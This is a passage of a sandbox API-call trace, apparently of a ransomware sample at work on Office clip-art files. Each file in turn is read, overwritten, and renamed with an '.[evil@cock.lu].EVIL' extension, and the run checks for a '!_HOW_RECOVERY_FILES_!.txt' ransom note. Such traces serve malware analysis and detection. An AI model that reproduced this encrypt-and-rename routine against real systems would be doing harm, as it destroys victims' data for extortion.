lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd40, lpOverlapped=0x0) returned 1 [0106.992] CloseHandle (hObject=0x1a8) returned 1 [0106.993] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0106.993] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0106.993] __uncaught_exception () returned 0x84b1160800 [0106.993] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0106.993] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif.[evil@cock.lu].evil")) returned 1 [0106.994] ??_V@YAXPEAX@Z () returned 0x1 [0106.996] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF", dwFileAttributes=0x200) returned 0 [0106.996] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.041] wcsstr (_Str="AG00176_.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.041] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 69 [0107.041] wcscmp (_String1="AG00176_.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.041] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AG00176_.GIF") returned 0x0 [0107.041] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 0x45 [0107.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.059] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc30, lpOverlapped=0x0) returned 1 [0107.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.074] _errno () returned 0x84b1160840 [0107.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc40, lpOverlapped=0x0) returned 1 [0107.074] CloseHandle (hObject=0x1a8) returned 1 [0107.074] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.075] __uncaught_exception () returned 0x84b1160800 [0107.075] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.075] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.[evil@cock.lu].evil")) returned 1 [0107.075] ??_V@YAXPEAX@Z () returned 0x1 [0107.078] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF", dwFileAttributes=0x200) returned 0 [0107.078] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.078] wcsstr (_Str="AN00010_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.078] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 69 [0107.078] wcscmp (_String1="AN00010_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.078] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00010_.WMF") returned 0x0 [0107.078] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 0x45 [0107.078] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.080] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbd2, lpOverlapped=0x0) returned 1 [0107.725] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.725] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.725] _errno () returned 0x84b1160840 [0107.725] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.725] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0107.726] CloseHandle (hObject=0x1a8) returned 1 [0107.726] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.726] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.726] __uncaught_exception () returned 0x84b1160800 [0107.726] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.726] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00010_.wmf.[evil@cock.lu].evil")) returned 1 [0107.727] ??_V@YAXPEAX@Z () returned 0x1 [0107.730] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00010_.WMF", dwFileAttributes=0x200) returned 0 [0107.730] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.730] wcsstr (_Str="AN00015_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.730] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 69 [0107.730] wcscmp (_String1="AN00015_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.730] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00015_.WMF") returned 0x0 [0107.730] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 0x45 [0107.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.742] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x127e, lpOverlapped=0x0) returned 1 [0107.749] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.749] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.749] _errno () returned 0x84b1160840 [0107.749] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.749] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0107.750] CloseHandle (hObject=0x1a8) returned 1 [0107.750] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.750] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.750] __uncaught_exception () returned 0x84b1160800 [0107.750] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.750] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00015_.wmf.[evil@cock.lu].evil")) returned 1 [0107.751] ??_V@YAXPEAX@Z () returned 0x1 [0107.753] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00015_.WMF", dwFileAttributes=0x200) returned 0 [0107.753] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.753] wcsstr (_Str="AN00790_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.753] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 69 [0107.754] wcscmp (_String1="AN00790_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.754] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00790_.WMF") returned 0x0 [0107.754] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 0x45 [0107.754] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.756] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1634, lpOverlapped=0x0) returned 1 [0107.769] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.769] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.769] _errno () returned 0x84b1160840 [0107.769] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.769] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1640, lpOverlapped=0x0) returned 1 [0107.769] CloseHandle (hObject=0x1a8) returned 1 [0107.769] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.769] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.769] __uncaught_exception () returned 0x84b1160800 [0107.769] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.770] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.[evil@cock.lu].evil")) returned 1 [0107.770] ??_V@YAXPEAX@Z () returned 0x1 [0107.773] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF", dwFileAttributes=0x200) returned 0 [0107.773] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.773] wcsstr (_Str="AN00853_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.773] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 69 [0107.773] wcscmp (_String1="AN00853_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.773] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00853_.WMF") returned 0x0 [0107.773] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 0x45 [0107.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.775] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5062, lpOverlapped=0x0) returned 1 [0107.788] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.788] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.788] _errno () returned 0x84b1160840 [0107.788] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.788] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x5080, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5080, lpOverlapped=0x0) returned 1 [0107.789] CloseHandle (hObject=0x1a8) returned 1 [0107.789] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.789] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.789] __uncaught_exception () returned 0x84b1160800 [0107.789] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.789] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.[evil@cock.lu].evil")) returned 1 [0107.790] ??_V@YAXPEAX@Z () returned 0x1 [0107.793] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF", dwFileAttributes=0x200) returned 0 [0107.793] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.793] wcsstr (_Str="AN00914_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.793] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 69 [0107.793] wcscmp (_String1="AN00914_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.793] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00914_.WMF") returned 0x0 [0107.793] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 0x45 [0107.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.796] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a50, lpOverlapped=0x0) returned 1 [0107.799] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.799] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.799] _errno () returned 0x84b1160840 [0107.799] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.799] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a60, lpOverlapped=0x0) returned 1 [0107.800] CloseHandle (hObject=0x1a8) returned 1 [0107.800] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.800] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.800] __uncaught_exception () returned 0x84b1160800 [0107.800] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.800] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.[evil@cock.lu].evil")) returned 1 [0107.801] ??_V@YAXPEAX@Z () returned 0x1 [0107.805] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF", dwFileAttributes=0x200) returned 0 [0107.805] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.805] wcsstr (_Str="AN00932_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.805] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 69 [0107.805] wcscmp (_String1="AN00932_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.805] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00932_.WMF") returned 0x0 [0107.805] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 0x45 [0107.805] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.807] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x385c, lpOverlapped=0x0) returned 1 [0107.811] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.811] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.811] _errno () returned 0x84b1160840 [0107.811] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.811] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3860, lpOverlapped=0x0) returned 1 [0107.811] CloseHandle (hObject=0x1a8) returned 1 [0107.811] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.812] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.812] __uncaught_exception () returned 0x84b1160800 [0107.812] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.812] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf.[evil@cock.lu].evil")) returned 1 [0107.813] ??_V@YAXPEAX@Z () returned 0x1 [0107.817] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF", dwFileAttributes=0x200) returned 0 [0107.817] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.817] wcsstr (_Str="AN00965_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.817] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 69 [0107.817] wcscmp (_String1="AN00965_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.817] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN00965_.WMF") returned 0x0 [0107.817] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 0x45 [0107.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.819] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ba0, lpOverlapped=0x0) returned 1 [0107.822] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.822] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.823] _errno () returned 0x84b1160840 [0107.823] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.823] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1bc0, lpOverlapped=0x0) returned 1 [0107.823] CloseHandle (hObject=0x1a8) returned 1 [0107.823] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.823] fputc (in: _Ch=51, 